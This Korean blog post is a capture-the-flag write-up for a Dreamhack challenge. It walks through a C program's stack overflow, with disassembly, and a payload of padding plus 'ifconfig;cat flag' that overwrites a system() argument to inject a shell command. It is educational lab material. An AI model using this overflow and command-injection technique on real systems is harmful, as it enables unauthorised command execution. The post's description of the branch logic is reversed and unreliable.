728x90
반응형
앞선 문제도 그렇고, 조금 쉬어가는 코너 같은 느낌이다.
(사실, 문제 파일이 있다는 것을 망각하고 무작정 서버에 접속해서 아무 명령어나 넣어보고 있었음... 근데 아무런 반응이 없어서 이런식으로 문제 만들면 어떻게 풀라고 하는거지라는 생각을 하며...)
우선 코드를 보자.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int main()
{
char cmd_ip[256] = "ifconfig";
int dummy;
char center_name[24];
init();
printf("Center name: ");
read(0, center_name, 100);
if( !strncmp(cmd_ip, "ifconfig", 8)) {
system(cmd_ip);
}
else {
printf("Something is wrong!\n");
}
exit(0);
}gdb로 뜯어보면
gef➤ disas main
Dump of assembler code for function main:
0x00000000000008ad <+0>: push %rbp
0x00000000000008ae <+1>: mov %rsp,%rbp
0x00000000000008b1 <+4>: sub $0x130,%rsp
0x00000000000008b8 <+11>: mov %fs:0x28,%rax
0x00000000000008c1 <+20>: mov %rax,-0x8(%rbp)
0x00000000000008c5 <+24>: xor %eax,%eax
0x00000000000008c7 <+26>: movabs $0x6769666e6f636669,%rax
0x00000000000008d1 <+36>: mov $0x0,%edx
0x00000000000008d6 <+41>: mov %rax,-0x110(%rbp)
0x00000000000008dd <+48>: mov %rdx,-0x108(%rbp)
0x00000000000008e4 <+55>: lea -0x100(%rbp),%rdx
0x00000000000008eb <+62>: mov $0x0,%eax
0x00000000000008f0 <+67>: mov $0x1e,%ecx
0x00000000000008f5 <+72>: mov %rdx,%rdi
0x00000000000008f8 <+75>: rep stos %rax,%es:(%rdi)
0x00000000000008fb <+78>: mov $0x0,%eax
0x0000000000000900 <+83>: call 0x86a <init>
0x0000000000000905 <+88>: lea 0xf8(%rip),%rdi # 0xa04
0x000000000000090c <+95>: mov $0x0,%eax
0x0000000000000911 <+100>: call 0x710 <printf@plt>
0x0000000000000916 <+105>: lea -0x130(%rbp),%rax
0x000000000000091d <+112>: mov $0x64,%edx
0x0000000000000922 <+117>: mov %rax,%rsi
0x0000000000000925 <+120>: mov $0x0,%edi
0x000000000000092a <+125>: call 0x720 <read@plt>
0x000000000000092f <+130>: lea -0x110(%rbp),%rax
0x0000000000000936 <+137>: mov $0x8,%edx
0x000000000000093b <+142>: lea 0xd0(%rip),%rsi # 0xa12
0x0000000000000942 <+149>: mov %rax,%rdi
0x0000000000000945 <+152>: call 0x6e0 <strncmp@plt>
0x000000000000094a <+157>: test %eax,%eax
0x000000000000094c <+159>: jne 0x95f <main+178>
0x000000000000094e <+161>: lea -0x110(%rbp),%rax
0x0000000000000955 <+168>: mov %rax,%rdi
0x0000000000000958 <+171>: call 0x700 <system@plt>
0x000000000000095d <+176>: jmp 0x96b <main+190>
0x000000000000095f <+178>: lea 0xb5(%rip),%rdi # 0xa1b
0x0000000000000966 <+185>: call 0x6f0 <puts@plt>
0x000000000000096b <+190>: mov $0x0,%edi
0x0000000000000970 <+195>: call 0x740 <exit@plt>
End of assembler dump.중요한 부분은 아래와 같다.
우선 read 함수로 $rbp - 0x130 위치에 0x64 만큼 값을 받아들이고
...
0x0000000000000916 <+105>: lea -0x130(%rbp),%rax
0x000000000000091d <+112>: mov $0x64,%edx
0x0000000000000922 <+117>: mov %rax,%rsi
0x0000000000000925 <+120>: mov $0x0,%edi
0x000000000000092a <+125>: call 0x720 <read@plt>
...$rbp - 0x110 위치의 값과 $rip + 0xd0 값을 8 byte 비교해서
...
0x000000000000092f <+130>: lea -0x110(%rbp),%rax
0x0000000000000936 <+137>: mov $0x8,%edx
0x000000000000093b <+142>: lea 0xd0(%rip),%rsi # 0xa12
0x0000000000000942 <+149>: mov %rax,%rdi
0x0000000000000945 <+152>: call 0x6e0 <strncmp@plt>
...같으면 main + 178로 jump 해서 종료, 다르면 main +161 이후 system 함수를 실행시키고 종료한다.
0x000000000000094a <+157>: test %eax,%eax
0x000000000000094c <+159>: jne 0x95f <main+178>
0x000000000000094e <+161>: lea -0x110(%rbp),%rax
0x0000000000000955 <+168>: mov %rax,%rdi
0x0000000000000958 <+171>: call 0x700 <system@plt>
0x000000000000095d <+176>: jmp 0x96b <main+190>
0x000000000000095f <+178>: lea 0xb5(%rip),%rdi # 0xa1b
0x0000000000000966 <+185>: call 0x6f0 <puts@plt>
0x000000000000096b <+190>: mov $0x0,%edi
0x0000000000000970 <+195>: call 0x740 <exit@plt>즉 페이로드는 dummy 0x20 byte + ifconfig + 명령어 가 될 것이다.
개인적으로 명령어 뒤에 실행될 명령어로 ; 를 사용하였고, cat flag로 셀을 띄우지 않고 파일을 읽어냈다.
┌──(kali㉿kali)-[~/Downloads]
└─$ nc host3.dreamhack.games 16202
Center name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaifconfig;cat flag
DH{----------#플래그는 삭제}728x90
반응형
'Wargame > Dreamhack' 카테고리의 다른 글
| Bypass SECCOMP-1 (0) | 2022.08.05 |
|---|---|
| validator (0) | 2022.08.04 |
| sint (0) | 2022.08.04 |
| tcache_dup2 (0) | 2022.08.03 |
| tcache_dup (0) | 2022.08.03 |